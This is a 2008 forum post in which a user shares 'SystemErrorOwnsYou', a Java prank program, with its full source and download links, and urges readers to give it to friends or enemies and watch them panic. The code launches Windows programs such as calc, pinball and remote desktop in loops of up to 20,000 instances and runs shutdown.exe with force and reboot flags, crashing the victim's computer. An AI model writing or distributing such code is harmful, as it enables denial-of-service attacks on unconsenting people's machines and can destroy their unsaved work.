SystemErrorOwnsYou

Discussion in 'Java' started by Systemerror, Jan 11, 2008.

  1. Systemerror

    Systemerror New Member

    Joined:
    Jan 11, 2008
    Messages:
    18
    Likes Received:
    1
    Trophy Points:
    0
    Home Page:
    http://hackersparadise.synthasite.com/
    [​IMG]

    This is a tool I created to put your freinds or enemies under Denial of service conditions-
    Dont worry... this tool will not have any long lasting effect, in-fact once you re-boot you
    computer it will be in the exact same state as it was before you ran the application.

    All it basically does (if you cant understand the source) is loop variouse windows applications
    causing your computer to crash :) so dont be lame and give it your little sister or something
    give it to a computer cockey freind or one of your enemies and watch them panic.
    Again Makesure that you extract the files, and show extracted files in order for the executable application to work!

    (Source-code, executable, classfile) All Windows Platforms

    Primary Download URL
    http://hostingbulk.com/v/4718343/SystemErrorOwnsYou_Executable_src.zip.html

    Secondary Download URL
    http://www.mediafire.com/?79xmxsdeoje




    Code:
    public class SystemErrorOwnsYou                         //----------------pwnage coded by System error--------give it to your frends or enemies \:--------//
    {
     public static void main (String [] args)
     {
     try
       {
        int i = 1;
         String command = "C:\\WINDOWS\\system32\\calc.exe";
           Process p = Runtime.getRuntime().exec(command);
           for(i = 0; i <= 50; i ++)
            Runtime.getRuntime().exec(command);
        }
        catch (Exception e) {
    	System.out.println("fatal error");
    }
      try
       {
        int i = 1;
         String command = "C:\\WINDOWS\\system32\\shutdown.exe -i -l -s -r -a -f -m";
           Process p = Runtime.getRuntime().exec(command);
           for(i = 0; i <= 50; i ++)
            Runtime.getRuntime().exec(command);
        }
        catch (Exception e) {
    	System.out.println("fatal error");
      }
       try
       {
        int i = 1;
         String command = "C:\\Program Files\\Windows NT\\Pinball\\PINBALL.EXE";
           Process p = Runtime.getRuntime().exec(command);
           for(i = 0; i <= 50; i ++)
            Runtime.getRuntime().exec(command);
        }
        catch (Exception e) {
    	System.out.println("fatal error");
      }
    try
       {
        int i = 1;
         String command = "C:\\Program Files\\MSN Gaming Zone\\Windows\\Rvsezm.exe";
           Process p = Runtime.getRuntime().exec(command);
           for(i = 0; i <= 50; i ++)
            Runtime.getRuntime().exec(command);
        }
        catch (Exception e) {
    	System.out.println("fatal error");
        }
     try
       {
        int i = 1;
         String command = "C:\\WINDOWS\\system32\\calc.exe";
           Process p = Runtime.getRuntime().exec(command);
           for(i = 0; i <= 200; i ++)
            Runtime.getRuntime().exec(command);
        }
        catch (Exception e) {
    }	System.out.println("fatal error");
    try
       {
        int i = 1;
         String command = "C:\\WINDOWS\\system32\\mstsc.exe";
           Process p = Runtime.getRuntime().exec(command);
           for(i = 0; i <= 20000; i ++)
            Runtime.getRuntime().exec(command);
        }
        catch (Exception e) {
    	System.out.println("fatal error");
    
    //----------------pwnage!^^----------------//
      }
     }
    }
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice